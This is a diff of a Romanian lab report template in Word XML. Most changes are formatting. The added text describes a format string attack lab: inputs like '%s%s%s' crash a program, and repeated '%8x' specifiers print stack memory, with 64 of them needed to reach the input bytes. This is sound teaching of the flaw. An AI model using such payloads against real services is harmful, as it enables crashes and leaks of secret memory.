--- a/L02/SablonRaportL02.docx
+++ b/L02/SablonRaportL02.docx
@@ -6,10 +6,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
         <w:spacing w:before="240" w:after="60"/>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
+        <w:jc w:val="both"/>
+        <w:rPr/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -43,10 +41,8 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
+        <w:jc w:val="both"/>
+        <w:rPr/>
       </w:pPr>
       <w:commentRangeStart w:id="1"/>
       <w:r>
@@ -84,9 +80,8 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
+        <w:jc w:val="both"/>
+        <w:rPr/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -112,6 +107,7 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="2"/>
         </w:numPr>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:lang w:val="ro-RO"/>
         </w:rPr>
@@ -126,6 +122,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:lang w:val="ro-RO"/>
         </w:rPr>
@@ -229,84 +226,77 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:lang w:val="ro-RO"/>
         </w:rPr>
@@ -324,6 +314,7 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="2"/>
         </w:numPr>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:lang w:val="ro-RO"/>
         </w:rPr>
@@ -338,6 +329,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:lang w:val="ro-RO"/>
         </w:rPr>
@@ -400,15 +392,16 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="2"/>
         </w:numPr>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-        <w:t>atacul la nivelul codului prin inserarea unui string de tipul „%d%s%d%d” prin care se va accesa o zona invalida de pe stiva =&gt; duce la craprea programului și nu se va afisa fetele zambarete</w:t>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">atacul la nivelul codului prin inserarea unui string de tipul „%d%s%d%d” prin care se va accesa o zona invalida de pe stiva =&gt; duce la craparea; -la procent %s printf va accesa o zona invalida de memorie deaorece va trata valoare de pe stiva ce adresa; programului și nu se va afisa fetele zambarete; sau %s%s%s%s%s%s%s%s%s%s%s%s – programul va crapa deoarece pentru fiecare %s, functia va trata valoarea ca adresa și extrage date de la adresa respectiva </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t>=&gt; una dintre valorile de la acele adresa fiind invalida va duce la craprea programului</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -418,6 +411,7 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="2"/>
         </w:numPr>
+        <w:jc w:val="both"/>
         <w:rPr/>
       </w:pPr>
       <w:r>
@@ -548,6 +542,21 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:lang w:val="ro-RO"/>
         </w:rPr>
@@ -560,10 +569,10 @@
           <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="5">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
-              <wp:posOffset>233680</wp:posOffset>
+              <wp:posOffset>165100</wp:posOffset>
             </wp:positionH>
             <wp:positionV relativeFrom="paragraph">
-              <wp:posOffset>55245</wp:posOffset>
+              <wp:posOffset>-107315</wp:posOffset>
             </wp:positionV>
             <wp:extent cx="5715000" cy="1985010"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
@@ -606,131 +615,102 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="6">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>132080</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>-34290</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="5708650" cy="2588260"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="5" name="Image5" descr=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="5" name="Image5" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId6"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5708650" cy="2588260"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
       </w:r>
     </w:p>
     <w:p>
@@ -740,9 +720,8 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
+        <w:jc w:val="both"/>
+        <w:rPr/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -759,19 +738,6 @@
           <w:lang w:val="ro-RO"/>
         </w:rPr>
         <w:t>Tipărirea conținutului memoriei serverului</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
       </w:r>
     </w:p>
     <w:p>
@@ -781,6 +747,7 @@
           <w:ilvl w:val="1"/>
           <w:numId w:val="1"/>
         </w:numPr>
+        <w:jc w:val="both"/>
         <w:rPr/>
       </w:pPr>
       <w:r>
@@ -791,6 +758,731 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">Pentru afisarea continutului de pe stiva se va folosi un specificatorul </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>%x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve"> care afiesaza continutul in hexazecimal. Se introduc astfel de speficatori in inputul de la user pentru afisarea unor date de pe stiva care pot fi secrete; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>in aceasta metoda, valorile sunt afisate de server, si nu sunt returnate spre clientul rau intentionat</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="7">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>210820</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>90805</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="5715000" cy="2235835"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="6" name="Image6" descr=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="6" name="Image6" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId7"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5715000" cy="2235835"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">in codul inserat se pot observa specificatori de form %x prin =&gt; iar ca rezulat se pot observa valorile de pe stiva ce sunt afisate prin iserarea unor astfel de specificatori → valoarea </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve">target = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="B5CEA8"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>0x11223344</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">  fiind chiar capturata   </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">provocarea lansata in cadrul acestei sarcini se refera la afisarea primilor 4 octeti transmisi ca input; </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t>Vom lua 3 numere cu valoarea pentru a fi mai usor de a identifica seceventa de octeti. Scopul nostru e de identifica number1 (are 4 octeti)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="29"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>number1  = 0x44434241  #ABCD</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="29"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>number2  = 0x48474645  #EFGH</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="29"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">number3  = 0x41414141  #AAAA </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">ne folosim de o varianta a programului build_string.py pentru a forma mai multe </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">tipuri de formate. Numărul de </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>%x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> necesari se decide pe baza distanței dintre valoarea de început a pointerului  de argumente și variabilă. Numărul de %x se obține prin încercări</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">in programul de </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>build_string.py</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> N reprezinta numarulu de %8x folositi ca specificatori, iar 3 siruri de octeti sunt furnizati ca intrare la inceput pentru a observa cu exactitate ca s-a ajuns pe stiva la valoarea furnizata ca input; 8 – inseamna ca se padding prin spatiere;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">in urma mai multor incercari s-a ajuns la concluzia ca avem nevoie de 66 de specificatori pentru a afisa cei 12 octeti (ABCDEFGHAAAA). Ceea ce inseamna ca pentru afisarea primilor 4 octeti este nevoie de </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>64</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> de specificatori %8x</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="8">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:align>center</wp:align>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>635</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="5943600" cy="5355590"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="7" name="Image7" descr=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="7" name="Image7" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId8"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="5355590"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
